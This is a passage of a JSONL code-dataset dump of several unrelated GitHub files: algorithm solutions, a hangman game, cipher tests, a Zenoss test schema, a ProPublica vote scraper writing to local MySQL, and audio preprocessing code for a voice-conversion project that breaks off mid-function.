= 0\r\nfor i in range(N):\r\n length = 0\r\n for j in range(N):\r\n if matrix[j][i] == \".\":\r\n length += 1\r\n if matrix[j][i] == \"X\" or j == N-1:\r\n if length >= 2:\r\n cnt2 += 1\r\n length = 0\r\nprint(cnt, cnt2)","repo_name":"hyoung0/algorithm","sub_path":"백준/Silver/1652. 누울 자리를 찾아라/누울 자리를 찾아라.py","file_name":"누울 자리를 찾아라.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13263245586","text":"from logic import Logic\r\nfrom interface import Interface\r\n\r\nInterface.greetings()\r\n\r\nwhile not Logic.comparison():\r\n Interface.print_main_interface()\r\n char = input('Введите возможную букву: ')\r\n if Logic.len_check(char) and Logic.ord_check(char) :\r\n Logic.check_input(char)\r\n print(Logic.word_lst)\r\n if Logic.word_lst == Logic.word_try_lst:\r\n print(\"Поздравляю, вы победили! \")\r\n break\r\n else:\r\n print('\\n')\r\n print('Вы ввели неправильный символ, используйте кириллицу ')\r\n \r\n \r\n\r\nif Logic.comparison():\r\n print('Вы проиграли :(')\r\n Logic.print_word()","repo_name":"En1ggma/gallows-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23424607731","text":"import sys\r\nsys.stdout = open(\"out.txt\",\"w\")\r\nsys.stdin = open(\"in.txt\", \"r\")\r\nT = int(input())\r\nfor q in range(T):\r\n C, F, X = map(float, input().split())\r\n time = 0.0\r\n prod = 2.0\r\n done = 0.0\r\n ans = 123253643646444565656\r\n ansopt = 0\r\n while ansopt < 5:\r\n if ans >= time + X / prod:\r\n ans = time + X / prod\r\n else:\r\n ansopt += 1\r\n time += C / prod\r\n prod += F\r\n print(\"Case #%s: %s\"%(q+1, ans))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2343.py","file_name":"2343.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33996124691","text":"import io\n\nimport pytest\n\nfrom caesar_cypher.caesar_cypher import (\n convert_to_ascii,\n convert_to_int,\n decode_caesar,\n decode_vigenere,\n find_shift,\n get_indices_difference,\n get_key_length,\n get_user_input,\n)\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\", [(\"0 1 2\", \"0 1 2\"), (\"a b c\", \"a b c\")]\n)\ndef test_input(monkeypatch, test_inp_, expected):\n monkeypatch.setattr(\"sys.stdin\", io.StringIO(test_inp_))\n assert get_user_input() == expected\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\", [(\"0 1 2\", [0, 1, 2]), (\"0\", [0]), (\"\", [])]\n)\ndef test_convert_int(test_inp_, expected):\n assert convert_to_int(test_inp_) == expected\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\",\n [\n ([0, 1, 2], \"abc\"),\n ([7, 4, 11, 11, 14], \"hello\"),\n ([2, 7, 4, 4, 18, 4, 2, 0, 10, 4], \"cheesecake\"),\n ],\n)\ndef test_convert_to_ascii(test_inp_, expected):\n assert convert_to_ascii(test_inp_) == expected\n\n\ndef test_find_shift():\n text = \"r d c r t r c r f i j c x t r j c g z y y j w x h t y h m c u n j\"\n assert find_shift(text) == 21\n\n\ndef test_find_not_find_shift():\n text = \"r d c r t r c r f t b c x a r x x h a y y j w x a a y h m c u n j\"\n assert find_shift(text) == 0\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\",\n [\n ((\"r r r\", 21), \"mmm\"),\n ((\"x r j q q x c y f x y d\", 21), \"smells tasty\"),\n (\n (\"u q j f x j c h t r j c y w d c f c x q n h j\", 21),\n \"please come try a slice\",\n ),\n ((\"r r r\", 0), \"rrr\"),\n ],\n)\ndef test_decode_caesar(test_inp_, expected):\n test, shift = test_inp_\n assert decode_caesar(test, shift) == expected\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\",\n [\n (\"1\", 1),\n (\"2\", 2),\n (\"3\", 3),\n ],\n)\ndef test_get_key_length(monkeypatch, test_inp_, expected):\n monkeypatch.setattr(\"sys.stdin\", io.StringIO(test_inp_))\n assert get_key_length() == expected\n\n\n@pytest.mark.parametrize(\n \"test_input_, expected\",\n [\n ((\"e a s y\", \"e a s y\"), [0, 0, 0, 0]),\n ((\"l e s s x e a s y\", \"m f t t y f b t z\"), [1, 1, 1, 1, 1, 1, 1, 1, 1]),\n ((\"a b c d\", \"a c c e\"), [0, 1, 0, 1]),\n ((\"t e s t\", \"d i q d\"), [-16, 4, -2, -16]),\n ((\"\", \"\"), []),\n ],\n)\ndef test_indices_differences(test_input_, expected):\n plain, plain_encoded = test_input_\n assert get_indices_difference(plain, plain_encoded) == expected\n\n\n@pytest.mark.parametrize(\n \"test_input_, expected\",\n [\n ((\"t h e x k e y w o r d x w a s x a\", [0, 0, 0, 0], 1), \"the keyword was a\"),\n (\n (\"u i f y l f z x p s e y x b t y c\", [1, 1, 1, 1, 1, 1, 1, 1, 1], 1),\n \"the keyword was b\",\n ),\n (\n (\"t i i t x t h p u m d y l p o l x g a n i m i b r\", [0, 1, 0, 1], 2),\n \"this should look familiar\",\n ),\n ((\"c i a b i r h x c c x\", [-16, 4, -2, -16], 3), \"secret test\"),\n ((\"\", [], 1), \"\"),\n ],\n)\ndef test_decode_vigenere(test_input_, expected):\n target_message, indices, key_len = test_input_\n assert decode_vigenere(target_message, indices[:key_len]) == expected\n","repo_name":"ovisb/python-caesar-cypher","sub_path":"tests/test_caesar_cypher.py","file_name":"test_caesar_cypher.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17618199693","text":"from OFS.PropertyManager import PropertyManager\n\nfrom Products.ZenRelations.RelationshipManager import RelationshipManager as RM\nfrom Products.ZenRelations.RelSchema import ToMany, ToManyCont, ToOne\nfrom Products.ZenRelations.Exceptions import ZenRelationsError\n\n\nclass TestBaseClass(RM):\n pass\n\n\nclass DataRoot(TestBaseClass):\n def manage_afterAdd(self, item, container):\n self.zPrimaryBasePath = container.getPhysicalPath()\n TestBaseClass.manage_afterAdd(self, item, container)\n\n\nTS = \"Products.ZenRelations.tests.TestSchema.\"\n\n\nclass Device(TestBaseClass, PropertyManager):\n _properties = (\n {\n \"id\": \"pingStatus\",\n \"type\": \"int\",\n \"mode\": \"w\",\n \"setter\": \"setPingStatus\",\n },\n {\"id\": \"communities\", \"type\": \"lines\", \"mode\": \"w\"},\n )\n _relations = (\n (\"location\", ToOne(ToMany, TS + \"Location\", \"devices\")),\n (\"groups\", ToMany(ToMany, TS + \"Group\", \"devices\")),\n (\"organizer\", ToOne(ToManyCont, TS + \"Organizer\", \"devices\")),\n (\"interfaces\", ToManyCont(ToOne, TS + \"IpInterface\", \"device\")),\n )\n pingStatus = 0\n communities = ()\n\n\nclass Server(Device):\n _relations = (\n (\"admin\", ToOne(ToOne, TS + \"Admin\", \"server\")),\n ) + Device._relations\n\n\nclass IpInterface(TestBaseClass):\n _relations = ((\"device\", ToOne(ToManyCont, TS + \"Device\", \"interfaces\")),)\n beforeDelete = False\n afterAdd = False\n\n def manage_beforeDelete(self, item, container):\n self.beforeDelete = True\n\n def manage_afterAdd(self, item, container):\n if (\n not hasattr(self, \"__primary_parent__\")\n or item.__primary_parent__ != container\n ):\n raise ZenRelationsError(\"__primary_parent__ not set in afterAdd\")\n self.afterAdd = True\n\n\nclass Group(TestBaseClass):\n _relations = ((\"devices\", ToMany(ToMany, TS + \"Device\", \"groups\")),)\n\n\nclass Location(TestBaseClass):\n _relations = ((\"devices\", ToMany(ToOne, TS + \"Device\", \"location\")),)\n\n\nclass Admin(TestBaseClass):\n _relations = ((\"server\", ToOne(ToOne, TS + \"Server\", \"admin\")),)\n\n\nclass Organizer(TestBaseClass):\n _relations = (\n (\"parent\", ToOne(ToManyCont, TS + \"Organizer\", \"children\")),\n (\"children\", ToManyCont(ToOne, TS + \"Organizer\", \"parent\")),\n (\"devices\", ToManyCont(ToOne, TS + \"Device\", \"organizer\")),\n )\n\n def buildOrgProps(self):\n self._setProperty(\"zFloat\", -1.0, type=\"float\")\n self._setProperty(\"zInt\", -1, type=\"int\")\n self._setProperty(\"zString\", \"\", type=\"string\")\n self._setProperty(\"zBool\", True, type=\"boolean\")\n self._setProperty(\"zLines\", [\"one\", \"two\"], type=\"lines\")\n self._setProperty(\"zSelect\", \"zLines\", type=\"selection\")\n\n def getZenRootNode(self):\n return self.unrestrictedTraverse(\"/zport/dmd/Orgs\")\n\n\ndef create(context, klass, id):\n \"\"\"create an instance and attach it to the context passed\"\"\"\n inst = klass(id)\n context._setObject(id, inst)\n inst = context._getOb(id)\n return inst\n\n\nbuild = create\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenRelations/tests/TestSchema.py","file_name":"TestSchema.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"33339939661","text":"import requests\nimport os\nimport time\nimport mysql.connector\n# NOTE: DO I CARE ENOUGH TO MAKE SOME SORT OF DATA PRUNING FROM PREVENTING MY DATABASE FROM GROWING INFINETELY?\n# THE TRUTH COME OUT!!! IDK IF I AM !! Team after us: consider that question. Idk if I am worrying too much \n# but >inb4 20gb of data, but like, there's no way it gets that big, right???\n# also the more data we have, the slower the insert bc of the unique query thingie... JUST SAYING!!\n\ndef assign_opensecrets_data(primary_subject):\n return {\n \"Health\": [\"H\", \"Health\", \"Health\"],\n \"Government Operations and Politics\": [\"Z\", \"Joint Candidate Cmtes\", \"Joint Candidate Cmtes\"],\n \"International Affairs\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Congress\": [\"Z\", \"Joint Candidate Cmtes\", \"Joint Candidate Cmtes\"],\n \"Crime and Law Enforcement\": [\"P\", \"Labor\", \"Labor\"],\n \"Taxation\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Armed Forces and National Security\": [\"D\", \"Defense\", \"Defense\"],\n \"Public Lands and Natural Resources\": [\"E\", \"Energy/Nat Resource\", \"Energy & Natural Resources\"],\n \"Education\": [\"W\", \"Other\", \"Other\"],\n \"Transportation and Public Works\": [\"M\", \"Transportation\", \"Transportation\"],\n \"Immigration\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Science, Technology, Communications\": [\"C\", \"Communic/Electronics\", \"Communications/Electronics\"],\n \"Labor and Employment\": [\"P\", \"Labor\", \"Labor\"],\n \"Commerce\": [\"N\", \"Misc Business\", \"Misc Business\"],\n \"Environmental Protection\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Finance and Financial Sector\": [\"F\", \"Finance/Insur/RealEst\", \"Finance, Insurance & Real Estate\"],\n \"Energy\": [\"E\", \"Energy/Nat Resource\", \"Energy & Natural Resources\"],\n \"Civil Rights and Liberties, Minority Issues\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Agriculture and Food\": [\"A\", \"Agribusiness\", \"Agribusiness\"],\n \"Native Americans\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Economics and Public Finance\": [\"F\", \"Finance/Insur/RealEst\", \"Finance, Insurance & Real Estate\"],\n \"Law\": [\"K\", \"Lawyers & Lobbyists\", \"Lawyers & Lobbyists\"],\n \"Housing and Community Development\": [\"C\", \"Construction\", \"Construction\"],\n \"Emergency Management\": [\"W\", \"Other\", \"Other\"],\n \"Social Welfare\": [\"P\", \"Labor\", \"Labor\"],\n \"Sports and Recreation\": [\"N\", \"Misc Business\", \"Misc Business\"],\n \"Foreign Trade and International Finance\": [\"N\", \"Misc Business\", \"Misc Business\"],\n \"Families\": [\"Y\", \"Unknown\", \"Unknown\"],\n \"Arts, Culture, Religion\": [\"W\", \"Other\", \"Other\"],\n \"Water Resources Development\": [\"E\", \"Energy/Nat Resource\", \"Energy & Natural Resources\"],\n \"Animals\": [\"A\", \"Agribusiness\", \"Agribusiness\"]\n }.get(primary_subject, [\"Z\", \"PROBLEM\", \"PROBLEM\"])\n \ndef find_vote_information(bill_slug, congress_number, chamber):\n response = requests.get(f'https://api.propublica.org/congress/v1/{congress_number}/bills/{bill_slug}.json', headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n if len(response.json()[\"results\"][0][\"votes\"]) > 0:\n for vote in response.json()[\"results\"][0][\"votes\"]:\n if vote[\"chamber\"].lower() == chamber.lower():\n vote_url = vote[\"api_url\"]\n return parse_voter_data(vote_url)\n return None\n\ndef parse_voter_data(vote_url):\n response = requests.get(vote_url, headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n vote_dict = {}\n for position in response.json()[\"results\"][\"votes\"][\"vote\"][\"positions\"]:\n vote_dict[position[\"member_id\"]] = position[\"vote_position\"]\n return {\"vote_dict\":vote_dict, \"raw_response\": response.json()[\"results\"][\"votes\"][\"vote\"], \"vote_uri\": vote_url}\n return None\n\ndef parse_voter_data(vote_url):\n response = requests.get(vote_url, headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n vote_dict = {}\n for position in response.json()[\"results\"][\"votes\"][\"vote\"][\"positions\"]:\n vote_dict[position[\"member_id\"]] = position[\"vote_position\"]\n return {\"vote_dict\":vote_dict, \"raw_response\": response.json()[\"results\"][\"votes\"][\"vote\"], \"vote_uri\": vote_url}\n return None\n\n\nheaders_dict = {\n 'X-API-key': os.environ[\"PROPUBLICA_API_KEY\"]\n}\nchambers = [\n \"senate\",\n \"house\"\n]\ncongress_numbers = [117, 118, 119] # this means we can do at least 3 cycles xd\ncurrentest_congress = 0\n\nif __name__ == \"__main__\":\n\n member_data = []\n for chamber in chambers:\n for congress_number in congress_numbers:\n time.sleep(3)\n response = requests.get(f\"https://api.propublica.org/congress/v1/{congress_number}/{chamber}/members.json\", headers=headers_dict)\n if response.ok and response.json()[\"status\"] != 'ERROR':\n members = response.json()[\"results\"][0][\"members\"]\n if len(members) > 0:\n currentest_congress = congress_number if congress_number > currentest_congress else currentest_congress\n for member in members:\n member_data.append({\"name\": f\"{member['first_name']} {member['last_name']}\", \"chamber\": chamber, \"congress_no\": congress_number, \"id\":member[\"id\"]})\n else: \n print(\"idk if this year exists lmaooo\")\n\n for member in member_data:\n mydb = mysql.connector.connect(\n host=\"localhost\",\n port=3309,\n user=\"root\", \n password=\"secret\",\n database=\"ftvBackEnd\"\n )\n cursor = mydb.cursor()\n query = \"\"\"\n INSERT IGNORE INTO\n congressperson(id, name, congress_number, senate)\n VALUES \n (%s, %s, %s, %s)\n \"\"\"\n cursor.execute(query, (member[\"id\"], member[\"name\"], member[\"congress_no\"], member[\"chamber\"] == 'senate'))\n mydb.commit()\n mydb.close()\n \n\n vote_data = []\n for offset in range(0, 100, 20):\n print(\"offset: \", offset)\n for chamber in chambers:\n response = requests.get(f'https://api.propublica.org/congress/v1/{currentest_congress}/{chamber}/bills/{\"active\" if chamber.lower == \"house\" else \"passed\"}.json?offset={offset}', headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n bills = response.json()[\"results\"][0][\"bills\"]\n for bill in bills:\n bill_data = {}\n vote_information = find_vote_information(bill[\"bill_slug\"], currentest_congress, chamber)\n bill_data[\"vote_information\"] = vote_information\n if vote_information:\n bill_data[\"vote_date\"] = vote_information[\"raw_response\"][\"date\"]\n bill_data['bill_slug'] = bill['bill_slug']\n bill_data['bill_id'] = bill['bill_id']\n bill_data['bill_number'] = vote_information['raw_response']['bill']['number']\n bill_data['sponsor_id'] = bill[\"sponsor_id\"]\n bill_data['sponsor_uri'] = bill['sponsor_uri']\n bill_data['bill_uri'] = bill['bill_uri']\n bill_data['title'] = bill['title']\n bill_data['latest_action'] = vote_information['raw_response']['bill']['latest_action']\n bill_data['short_title'] = bill['short_title']\n bill_data['primary_subject'] = bill['primary_subject']\n bill_data[\"opensecrets_sector_data\"] = assign_opensecrets_data(bill[\"primary_subject\"])\n vote_data.append(bill_data)\n\n for vote in vote_data:\n bill_insert_query = \"\"\"\n INSERT IGNORE INTO \n bill(id, bill_slug, bill_number, sponsor_id,\n sponsor_uri, bill_uri, title,\n latest_action, short_title, primary_subject,\n opensecrets_sector_prefix, opensecrets_sector,\n opensecrets_sector_long)\n VALUES\n (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s, %s)\n \"\"\"\n mydb = mysql.connector.connect(\n host=\"localhost\",\n port=3309,\n user=\"root\", \n password=\"secret\",\n database=\"ftvBackEnd\"\n )\n cursor = mydb.cursor()\n cursor.execute(bill_insert_query, (\n vote['bill_id'],\n vote['bill_slug'],\n vote['bill_number'],\n vote['sponsor_id'],\n vote['sponsor_uri'],\n vote['bill_uri'],\n vote['title'],\n vote['latest_action'],\n vote['short_title'],\n vote['primary_subject'],\n vote[\"opensecrets_sector_data\"][0],\n vote[\"opensecrets_sector_data\"][1],\n vote[\"opensecrets_sector_data\"][2]\n ))\n mydb.commit()\n # vote sesh\n cursor.execute('select * from vote_session where date=%s and bill_id=%s', (vote[\"vote_date\"], vote[\"bill_id\"]))\n if len(cursor.fetchall()) < 1:\n vote_session_query = \"\"\"\n INSERT IGNORE INTO \n vote_session(date, senate, bill_id)\n VALUES\n (%s, %s, %s)\n \"\"\"\n cursor.execute(vote_session_query, (vote[\"vote_date\"], vote[\"vote_information\"][\"raw_response\"][\"chamber\"] == \"Senate\", vote[\"bill_id\"]))\n vote_id = cursor.lastrowid\n votes = vote[\"vote_information\"][\"vote_dict\"]\n vote_query = \"\"\"\n INSERT IGNORE INTO \n vote (congressperson_id, vote_session_id, position)\n VALUES \n (%s, %s, %s)\n \"\"\"\n for vote_response in votes:\n cursor.execute(vote_query, (vote_response, vote_id, votes[vote_response]))\n mydb.commit()\n mydb.close()","repo_name":"FundsToVotes/FTV_2022","sub_path":"serverside/propublica_updater/propublica_updater.py","file_name":"propublica_updater.py","file_ext":"py","file_size_in_byte":11442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8268722713","text":"import sys\nimport subprocess as sp\nimport os\n\nproblem = sys.argv[1]\n\ntest_file = f\"{problem}.test\"\n\n# Check if test file exist\nif (not os.path.isfile(test_file)):\n exit(0)\n\nwith open(f\"{problem}.test\", 'rb') as f:\n content = f.read()\n\ntestcases = content.split(b'\\n\\n')\nfor testcase in testcases:\n assert(testcase.startswith(b\"IN:\\n\"))\n out_idx = testcase.find(b\"OUT:\\n\")\n tc_in = testcase[4:out_idx]\n tc_out = testcase[out_idx+5:]\n \n # Feed target with input and check if output is correct\n out = sp.run(problem, input=tc_in, shell=True, stdout=sp.PIPE)\n if (tc_out.strip() == out.stdout.strip()):\n print(\"PASS\")\n else:\n print(\"FAIL\")\n ","repo_name":"3-24/problem-solving","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21661094720","text":"import multiprocessing as mp\nimport os\nimport time\nfrom multiprocessing.sharedctypes import Synchronized\nfrom typing import *\n\nimport librosa\nimport numpy as np\nimport scipy.signal as signal\nimport torch\nimport tqdm\nfrom pydantic import BaseModel\nfrom scipy.io import wavfile\n\nfrom latopia import f0_extractor, feature_extractor, volume_extractor\nfrom latopia.audio_slicer import Slicer\nfrom latopia.config.dataset import DatasetSubsetConfig\nfrom latopia.diffusion.vocoder import Vocoder\nfrom latopia.logger import set_logger\n\nfrom .base import AudioDataset\nfrom .diffusion import DiffusionAudioDataSubset\n\nlogger = set_logger(__name__)\n\n\nclass WriteWaveTask(BaseModel):\n target_sr: int\n slice: bool = True\n write_mute: bool = True\n subset_config: List[DatasetSubsetConfig]\n\n\nclass F0ExtractTask(BaseModel):\n f0_method: f0_extractor.F0_METHODS_TYPE\n max_workers: int = 1\n crepe_model: str = \"tiny\"\n sampling_rate: int = 16000\n hop_length: int = 160\n f0_max: int = 1100.0\n f0_min: int = 50.0\n f0_mel_max: Optional[int] = None\n f0_mel_min: Optional[int] = None\n\n\nclass FeatureExtractTask(BaseModel):\n sampling_rate: int = 16000\n hop_length: int = 160\n encoder_path: str\n encoder_output_layer: Literal[9, 12] = 12\n device: str = \"cpu\"\n subset_config: List[DatasetSubsetConfig]\n\n\nclass MelExtractTask(BaseModel):\n sampling_rate: int = 40000\n device: str = \"cpu\"\n vocoder_path: str\n vocoder_type: Literal[\"nsf-hifigan\", \"nsf-hifigan-log10\"] = \"nsf-hifigan\"\n\n\nclass VolumeExtractTask(BaseModel):\n sampling_rate: int = 16000\n hop_length: int = 160\n\n\ndef load_audio(path: str, sr: Optional[int] = None):\n audio, sr = librosa.load(path, sr=sr)\n if len(audio.shape) > 1:\n audio = librosa.to_mono(audio)\n return audio, sr\n\n\ndef write_wave_runner(\n progress: Synchronized, files: List[Tuple[int, str, str]], task_raw: Dict\n):\n task = WriteWaveTask.parse_obj(task_raw)\n slicer = Slicer(\n sr=task.target_sr,\n threshold=-42,\n min_length=1500,\n min_interval=400,\n hop_size=15,\n max_sil_kept=500,\n )\n\n per = 3.7\n overlap = 0.3\n tail = per + overlap\n max = 0.95\n alpha = 0.8\n\n bh, ah = signal.butter(N=5, Wn=48, btype=\"high\", fs=task.target_sr)\n\n for subset_idx, file, dir in files:\n subset_config = task.subset_config[subset_idx]\n waves_dir = os.path.join(dir, DiffusionAudioDataSubset.WAVES_DIR_NAME)\n waves_16k_dir = os.path.join(dir, DiffusionAudioDataSubset.WAVES_16K_DIR_NAME)\n os.makedirs(waves_dir, exist_ok=True)\n os.makedirs(waves_16k_dir, exist_ok=True)\n\n def write_wave(tmp_audio: np.ndarray, filename: str):\n if subset_config.normalize:\n tmp_audio = (tmp_audio / np.abs(tmp_audio).max() * (max * alpha)) + (\n 1 - alpha\n ) * tmp_audio\n else:\n # clip level to max (cause sometimes when floating point decoding)\n audio_min = np.min(tmp_audio)\n if audio_min < -max:\n tmp_audio = tmp_audio / -audio_min * max\n audio_max = np.max(tmp_audio)\n if audio_max > max:\n tmp_audio = tmp_audio / audio_max * max\n\n wavfile.write(\n os.path.join(waves_dir, f\"{filename}.wav\"),\n task.target_sr,\n tmp_audio.astype(np.float32),\n )\n\n tmp_audio = librosa.resample(\n tmp_audio, orig_sr=task.target_sr, target_sr=16000, res_type=\"soxr_vhq\"\n )\n wavfile.write(\n os.path.join(waves_16k_dir, f\"{filename}.wav\"),\n 16000,\n tmp_audio.astype(np.float32),\n )\n\n audio, sr = load_audio(file, task.target_sr)\n audio = signal.lfilter(bh, ah, audio)\n if task.slice:\n for audio in slicer.slice(audio):\n i = 0\n while 1:\n start = int(task.target_sr * (per - overlap) * i)\n i += 1\n if len(audio[start:]) > tail * task.target_sr:\n tmp_audio = audio[start : start + int(per * task.target_sr)]\n write_wave(\n tmp_audio,\n f\"{os.path.splitext(os.path.basename(file))[0]}_{i}\",\n )\n else:\n tmp_audio = audio[start:]\n break\n write_wave(\n tmp_audio, f\"{os.path.splitext(os.path.basename(file))[0]}_{i}\"\n )\n else:\n write_wave(audio, os.path.splitext(os.path.basename(file))[0])\n\n progress.value += 1\n\n mute_filepath = os.path.join(waves_dir, \"__mute.wav\")\n mute_16k_filepath = os.path.join(waves_16k_dir, \"__mute.wav\")\n\n if task.write_mute:\n if not os.path.exists(mute_filepath):\n wavfile.write(\n mute_filepath,\n task.target_sr,\n np.zeros(task.target_sr * 3).astype(np.float32),\n )\n if not os.path.exists(mute_16k_filepath):\n wavfile.write(\n mute_16k_filepath,\n 16000,\n np.zeros(16000 * 3).astype(np.float32),\n )\n\n\ndef f0_extract_runner(\n progress: Synchronized, files: List[Tuple[str, str]], task_raw: Dict\n):\n task = F0ExtractTask.parse_obj(task_raw)\n\n for file, dir in files:\n f0_dir = os.path.join(dir, DiffusionAudioDataSubset.F0_DIR_NAME)\n f0_nsf_dir = os.path.join(dir, DiffusionAudioDataSubset.F0_NSF_DIR_NAME)\n os.makedirs(f0_dir, exist_ok=True)\n os.makedirs(f0_nsf_dir, exist_ok=True)\n\n audio, sr = load_audio(file)\n\n n_frames = int(len(audio) // task.hop_length) + 1\n start_frame = int(0 * task.sampling_rate / task.hop_length)\n real_silence_front = start_frame * task.hop_length / task.sampling_rate\n audio = audio[int(np.round(real_silence_front * task.sampling_rate)) :]\n\n def pad(f0):\n if \"crepe\" in task.f0_method:\n f0 = np.array(\n [\n f0[\n int(\n min(\n int(\n np.round(\n n\n * task.hop_length\n / task.sampling_rate\n / 0.005\n )\n ),\n len(f0) - 1,\n )\n )\n ]\n for n in range(n_frames - start_frame)\n ]\n )\n f0 = np.pad(f0, (start_frame, 0))\n else:\n f0 = np.pad(\n f0.astype(np.float32),\n (start_frame, n_frames - len(f0) - start_frame),\n )\n\n return f0\n\n f0 = f0_extractor.compute(\n audio,\n method=task.f0_method,\n sr=sr,\n hop=task.hop_length,\n max=task.f0_max,\n min=task.f0_min,\n )\n f0 = pad(f0)\n np.save(\n os.path.join(f0_nsf_dir, f\"{os.path.basename(file)}.npy\"),\n f0,\n allow_pickle=False,\n )\n coarse = f0_extractor.course(f0, 256)\n coarse = pad(coarse)\n np.save(\n os.path.join(f0_dir, f\"{os.path.basename(file)}.npy\"),\n coarse,\n allow_pickle=False,\n )\n\n progress.value += 1\n\n\ndef feature_extract_runner(\n progress: Synchronized, files: List[Tuple[int, str, str]], task_raw: Dict\n):\n task = FeatureExtractTask.parse_obj(task_raw)\n device = torch.device(task.device)\n encoder = feature_extractor.load_encoder(task.encoder_path, device)[0]\n\n for subset_idx, file, dir in files:\n subset_config = task.subset_config[subset_idx]\n features_dir = os.path.join(dir, DiffusionAudioDataSubset.FEATURES_DIR_NAME)\n os.makedirs(features_dir, exist_ok=True)\n\n audio, sr = load_audio(file)\n audio = torch.from_numpy(audio).float().unsqueeze(0).to(device)\n\n features = feature_extractor.extract(\n audio,\n sr,\n device,\n encoder,\n task.encoder_output_layer,\n subset_config.normalize,\n )\n\n if np.isnan(features).sum() != 0:\n logger.warning(f\"{file} contains nan, skip\")\n else:\n np.save(\n os.path.join(\n features_dir, f\"{os.path.splitext(os.path.basename(file))[0]}.npy\"\n ),\n features,\n allow_pickle=False,\n )\n progress.value += 1\n\n\ndef extract_mel_spectrogram_runner(\n progress: Synchronized, files: List[Tuple[str, str]], task_raw: Dict\n):\n task = MelExtractTask.parse_obj(task_raw)\n device = torch.device(task.device)\n vocoder = Vocoder(task.vocoder_type, task.vocoder_path, device)\n for file, dir in files:\n mel_dir = os.path.join(dir, DiffusionAudioDataSubset.MEL_DIR_NAME)\n os.makedirs(mel_dir, exist_ok=True)\n audio, sr = load_audio(file, task.sampling_rate)\n audio = torch.from_numpy(audio).float().unsqueeze(0).to(device)\n mel = vocoder.extract(audio, task.sampling_rate)\n mel = mel.squeeze().to(\"cpu\").numpy()\n np.save(\n os.path.join(mel_dir, f\"{os.path.splitext(os.path.basename(file))[0]}.npy\"),\n mel,\n allow_pickle=False,\n )\n progress.value += 1\n\n\ndef extract_volume_runner(\n progress: Synchronized, files: List[Tuple[str, str]], task_raw: Dict\n):\n task = VolumeExtractTask.parse_obj(task_raw)\n for file, dir in files:\n volumes_dir = os.path.join(dir, DiffusionAudioDataSubset.VOLUME_DIR_NAME)\n os.makedirs(volumes_dir, exist_ok=True)\n audio, sr = load_audio(file, task.sampling_rate)\n volume = volume_extractor.extract_volume(audio, hop_size=task.hop_length)\n np.save(\n os.path.join(\n volumes_dir, f\"{os.path.splitext(os.path.basename(file))[0]}.npy\"\n ),\n volume,\n allow_pickle=False,\n )\n progress.value += 1\n\n\ndef mp_progress_bar(progress: Synchronized, total: int):\n bar = tqdm.tqdm(total=total)\n while progress.value < total:\n bar.n = progress.value\n bar.refresh()\n time.sleep(0.1)\n bar.n = progress.value\n bar.refresh()\n bar.close()\n\n\nclass PreProcessor:\n def __init__(self, dataset: AudioDataset) -> None:\n self.dataset = dataset\n\n def run_progress_proc(\n self,\n target: Callable,\n files: List[Tuple[str, str]],\n args: List[Any],\n max_workers: int = 1,\n ):\n progress = mp.Value(\"i\", 0)\n processes: List[mp.Process] = []\n for i in range(max_workers):\n ps = mp.Process(\n target=target,\n args=(progress, files[i::max_workers], *args),\n )\n processes.append(ps)\n ps.start()\n\n progress_ps = mp.Process(\n target=mp_progress_bar,\n args=(\n progress,\n len(files),\n ),\n )\n progress_ps.start()\n\n for ps in processes:\n ps.join()\n\n progress_ps.kill()\n\n def write_wave(\n self,\n target_sr: int,\n slice: bool = True,\n write_mute: bool = True,\n max_workers: int = 1,\n ):\n files = []\n for i, subset in enumerate(self.dataset.subsets):\n for file in subset.files:\n files.append((i, file, subset.get_processed_dir()))\n\n self.run_progress_proc(\n write_wave_runner,\n files,\n (\n WriteWaveTask(\n target_sr=target_sr,\n slice=slice,\n write_mute=write_mute,\n subset_config=[subset.config for subset in self.dataset.subsets],\n ).dict(),\n ),\n max_workers,\n )\n\n def extract_f0(\n self,\n f0_method: f0_extractor.F0_METHODS_TYPE,\n max_workers: int = 1,\n crepe_model: str = \"tiny\",\n hop_length: int = 160,\n f0_max: int = 1100.0,\n f0_min: int = 50.0,\n f0_mel_max: Optional[int] = None,\n f0_mel_min: Optional[int] = None,\n ):\n files = []\n for subset in self.dataset.subsets:\n for file in subset.get_waves():\n files.append((file, subset.get_processed_dir()))\n\n if \"crepe\" in f0_method:\n max_workers = 1\n\n 